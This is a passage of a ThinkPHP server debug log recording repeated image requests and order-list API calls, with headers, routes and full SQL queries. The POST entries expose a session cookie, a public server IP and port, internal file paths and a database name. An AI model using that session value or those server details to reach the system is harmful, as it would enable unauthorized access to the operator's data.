'47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:19+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.026567s][吞吐率:37.64req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000058s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001682s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:19+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020261s][吞吐率:49.36req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000051s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001144s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:19+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021237s][吞吐率:47.09req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001148s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:19+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019251s][吞吐率:51.95req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000052s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001238s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:19+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021580s][吞吐率:46.34req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000054s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001236s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:20+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021819s][吞吐率:45.83req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001239s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:20+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019955s][吞吐率:50.11req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000050s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001082s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:20+08:00 ] 106.112.205.110 POST /api/office/officeorder/getorderlist?userId=100&keywords=&shenhe=1&offset=2&pageNum=10 [ info ] 47.105.33.115:8081/api/office/officeorder/getorderlist?userId=100&keywords=&shenhe=1&offset=2&pageNum=10 [运行时间:0.069089s][吞吐率:14.47req/s] [内存消耗:4,914.57kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000051s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001293s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'office.officeorder', 2 => 'getorderlist', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=nce81t0u9kp1dno0b3r5stvcd0', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '100', 'keywords' => '', 'shenhe' => '1', 'offset' => '2', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001702s ] [ info ] [ RUN ] app\api\controller\office\Officeorder->getorderlist[ /alidata/www/gendan/application/api/controller/office/Officeorder.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000469s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001836s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 100 LIMIT 1 [ RunTime:0.000435s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001839s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001338s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`factorymge_id` = 40 AND `orderinfo`.`pid` = 0 AND ( 1=1 ) AND ( order_status in ("1","2") or ( order_status = "3" and kehu_id != 0) ) ORDER BY 1658308460>orderinfo.end_time desc,1658308460>orderinfo.end_time desc,1658308460-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 20,10 [ RunTime:0.003850s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_material` [ RunTime:0.001706s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000465s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000293s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000282s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000344s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000302s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000258s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000286s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000275s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000476s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000481s ] --------------------------------------------------------------- [ 2022-07-20T17:14:20+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021226s][吞吐率:47.11req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001164s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:20+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019757s][吞吐率:50.62req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001095s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:21+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021077s][吞吐率:47.45req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000051s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001166s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:21+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020776s][吞吐率:48.13req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001128s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:21+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020136s][吞吐率:49.66req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001132s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:21+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021817s][吞吐率:45.84req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001113s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:21+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.023662s][吞吐率:42.26req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001179s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:22+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021057s][吞吐率:47.49req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001148s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:23+08:00 ] 106.112.205.110 POST /api/office/officeorder/getorderlist?userId=100&keywords=&shenhe=1&offset=3&pageNum=10 [ info ] 47.105.33.115:8081/api/office/officeorder/getorderlist?userId=100&keywords=&shenhe=1&offset=3&pageNum=10 [运行时间:0.062977s][吞吐率:15.88req/s] [内存消耗:4,914.52kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001174s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'office.officeorder', 2 => 'getorderlist', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=nce81t0u9kp1dno0b3r5stvcd0', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '100', 'keywords' => '', 'shenhe' => '1', 'offset' => '3', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001668s ] [ info ] [ RUN ] app\api\controller\office\Officeorder->getorderlist[ /alidata/www/gendan/application/api/controller/office/Officeorder.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000486s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001414s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 100 LIMIT 1 [ RunTime:0.000430s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001591s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001028s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`factorymge_id` = 40 AND `orderinfo`.`pid` = 0 AND ( 1=1 ) AND ( order_status in ("1","2") or ( order_status = "3" and kehu_id != 0) ) ORDER BY 1658308463>orderinfo.end_time desc,1658308463>orderinfo.end_time desc,1658308463-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 30,10 [ RunTime:0.002427s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_material` [ RunTime:0.001588s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000318s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000396s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000466s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000320s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000348s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000217s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000312s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000250s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000231s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000217s ] --------------------------------------------------------------- [ 2022-07-20T17:14:23+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020662s][吞吐率:48.40req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001113s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:23+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020724s][吞吐率:48.25req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001326s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:23+08:00 ] 106.112.205.110 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.030799s][吞吐率:32.47req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001240s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array 